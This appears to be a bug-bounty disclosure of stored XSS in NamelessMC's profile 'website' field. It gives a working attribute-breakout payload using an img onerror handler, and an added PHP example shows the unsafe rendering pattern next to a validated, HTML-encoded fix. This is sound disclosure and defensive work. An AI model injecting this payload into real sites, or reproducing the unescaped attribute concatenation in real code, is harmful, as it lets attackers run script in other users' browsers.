Stored XSS in profile settings in namelessmc/nameless
Jul 2nd 2022
Stored XSS via "Website" box in Profile Settings.
Proof of Concept
Go to profile settings, put the following payload in the "website" box:
google.com"><img src=x onerror=alert(document.domain)>
Save, and see the XSS triggered!
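Why the payload above fires and one way to close it, as an added example that is not part of the original report and is not NamelessMC's code. It assumes the stored "website" value is written unescaped into a double-quoted HTML attribute, which is what the `">` prefix of the payload implies; all function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Added illustration, not NamelessMC code; all function names are hypothetical.

// Assumed vulnerable pattern: the stored value is concatenated into a
// double-quoted attribute, so a '"' in the value ends the attribute early.
function render_website_unsafe(string $website): string
{
    return '<a href="' . $website . '">' . $website . '</a>';
}

// Input check: accept only absolute http(s) URLs of bounded length.
function normalize_website(string $input): ?string
{
    $input = trim($input);
    if ($input === '' || strlen($input) > 2048) {
        return null;
    }
    if (filter_var($input, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($input, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $input : null;
}

// Output encoding: this is what keeps the value inside the attribute even if
// validation is loosened later, because '"', '<' and '>' become entities.
function render_website_safe(string $website): string
{
    $url = normalize_website($website);
    if ($url === null) {
        return ''; // render nothing rather than an unvalidated link
    }
    $e = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $e . '" rel="nofollow noopener">' . $e . '</a>';
}

// Constructed inputs: the value from the report, and a benign URL.
$poc = 'google.com"><img src=x onerror=alert(document.domain)>';
$ok  = 'https://example.com/profile?id=1&tab=2';

echo "unsafe(poc): ", render_website_unsafe($poc), PHP_EOL;
echo "safe(poc):   ", var_export(render_website_safe($poc), true), PHP_EOL;
echo "safe(ok):    ", render_website_safe($ok), PHP_EOL;
```

Validation on save only affects new submissions; values already stored are neutralized by the encoding applied at render time, so both layers are needed.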
We are processing your report and will contact the namelessmc/nameless team within 24 hours. a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher's credibility has increased: +7